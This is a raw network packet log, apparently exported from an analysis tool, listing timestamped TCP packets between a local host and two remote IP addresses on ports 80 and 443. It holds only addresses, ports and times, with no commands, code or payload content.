                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.340338945 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.340361118 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.340468884 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.342627048 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.342679977 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.342742920 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.342791080 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.347412109 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.347486019 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.347505093 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.347548008 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.352207899 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.352260113 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.352277040 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.352330923 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.356944084 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.357019901 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.357043028 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.357089996 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.361605883 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.361674070 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.361726046 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.361773014 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.366278887 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.366386890 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.366419077 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.366471052 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.370989084 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.371041059 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.371102095 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.371155977 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.375710964 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.375785112 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.375788927 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.375838995 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.380345106 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.380410910 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.380436897 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.380484104 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.385040998 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.385117054 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.385149956 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.385206938 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.389725924 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.389815092 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.389834881 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.389884949 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.394438028 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.394584894 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.394638062 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.399106979 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.399173021 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.399221897 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.399271965 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.402988911 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.403042078 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.403078079 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.403162956 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.406804085 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.406900883 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.406909943 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.406946898 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.410672903 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.410723925 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.410799980 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.411118984 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.414489985 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.414592981 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.414622068 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.414664984 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.418363094 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.418416977 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.418454885 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.418534994 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.422179937 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.422230959 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.422319889 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.422391891 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.426098108 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.426148891 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.426167965 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.426214933 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.429887056 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.429960012 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.532527924 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.532581091 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.532663107 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.532716990 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.534035921 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.534080982 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.534157991 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.534194946 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.536907911 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.536977053 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.537019968 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.537072897 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.539841890 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.539885044 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.539978027 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.540043116 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.542762995 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.542814016 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.542843103 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.542891979 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.545649052 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.545696974 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.545773029 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.545813084 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.548348904 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.548470974 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.548520088 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.548566103 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.551214933 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.551263094 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.551306009 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.551347971 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.553705931 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.553755045 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.553858042 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.553919077 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.556329012 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.556380033 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.556427002 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.556464911 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.558917999 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.559032917 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.559045076 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.559189081 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.561583996 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.561638117 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.561681032 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.561732054 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.564173937 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.564219952 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.564270973 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.564310074 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.566782951 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.566828966 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.567003965 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.567065954 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.569387913 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.569446087 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.569485903 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.569535017 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.572015047 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.572113037 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.572113037 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.572175026 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.574668884 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.574724913 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.574786901 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.574826002 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.577260971 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.577311039 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.577373028 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.577413082 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.579873085 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.579925060 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.579987049 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.580041885 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.582484007 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.582575083 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.582597017 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.582644939 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.585150003 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.585196018 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.585241079 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.585350990 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.587726116 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.587784052 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.587829113 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.587868929 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.590434074 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.590481997 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.590523958 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.590563059 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.593130112 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.593190908 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.593231916 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.593297005 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.595598936 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.595695019 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.595735073 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.595782042 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.598294020 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.598334074 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.598396063 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.600852966 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.600904942 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.600938082 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.600981951 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.603636980 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.603652954 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.603702068 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.606132984 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.606187105 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.606206894 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.606244087 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.608683109 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.608732939 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.608776093 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.608822107 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.611406088 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.611459017 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.611509085 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.611587048 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.613967896 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.614022017 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.614022970 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.615648031 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.616552114 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.616671085 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.616687059 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.616729975 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.619160891 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.619259119 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.619308949 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.621822119 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.621917963 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.621948957 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.622028112 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.624393940 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.624469995 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.629086018 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.629214048 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.631977081 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.631990910 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.632704973 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.634471893 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.634497881 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.634556055 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.724757910 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.724812031 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.724894047 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.724948883 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.725899935 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.726008892 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.726026058 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.726095915 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.728010893 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.728095055 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.728096008 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.728194952 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.730186939 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.730231047 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.730309010 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.730349064 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.732312918 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.732400894 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.732459068 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.732506037 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.734484911 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.734509945 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.734536886 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.734560966 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.736519098 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.736572027 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.736640930 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.736689091 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.738622904 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.738687038 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.738692045 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.738879919 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.740705013 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.740751028 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.740755081 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.740921021 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.742621899 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.742728949 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.742748022 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.742882967 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.744579077 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.744633913 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.744680882 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.744725943 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.746551991 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.746623993 CET4989280192.168.2.431.41.244.11
